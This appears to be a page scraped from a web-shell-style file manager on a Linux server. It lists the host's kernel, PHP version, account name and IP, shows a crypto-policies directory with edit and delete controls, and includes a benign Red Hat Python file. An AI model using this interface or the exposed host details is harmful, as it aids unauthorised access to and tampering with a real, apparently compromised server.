[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
share
/
crypto-policies
/
python
/
policygenerators
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
π __pycache__
SET
[ DEL ]
π __init__.py
837 B
SET
[ EDIT ]
|
[ DEL ]
π bind.py
2,279 B
SET
[ EDIT ]
|
[ DEL ]
π configgenerator.py
401 B
SET
[ EDIT ]
|
[ DEL ]
π gnutls.py
5,605 B
SET
[ EDIT ]
|
[ DEL ]
π java.py
3,667 B
SET
[ EDIT ]
|
[ DEL ]
π krb5.py
1,648 B
SET
[ EDIT ]
|
[ DEL ]
π libreswan.py
4,827 B
SET
[ EDIT ]
|
[ DEL ]
π libssh.py
4,111 B
SET
[ EDIT ]
|
[ DEL ]
π nss.py
4,900 B
SET
[ EDIT ]
|
[ DEL ]
π openssh.py
8,380 B
SET
[ EDIT ]
|
[ DEL ]
π openssl.py
5,586 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: configgenerator.py
# SPDX-License-Identifier: LGPL-2.1-or-later # Copyright (c) 2019 Red Hat, Inc. # Copyright (c) 2019 TomΓ‘Ε‘ MrΓ‘z <tmraz@fedoraproject.org> import sys class ConfigGenerator: RELOAD_CMD = '' @staticmethod def append(s, val, sep=':'): if s: if val: return s + sep + val return s return val @staticmethod def eprint(*args, **kwargs): print(*args, file=sys.stderr, **kwargs)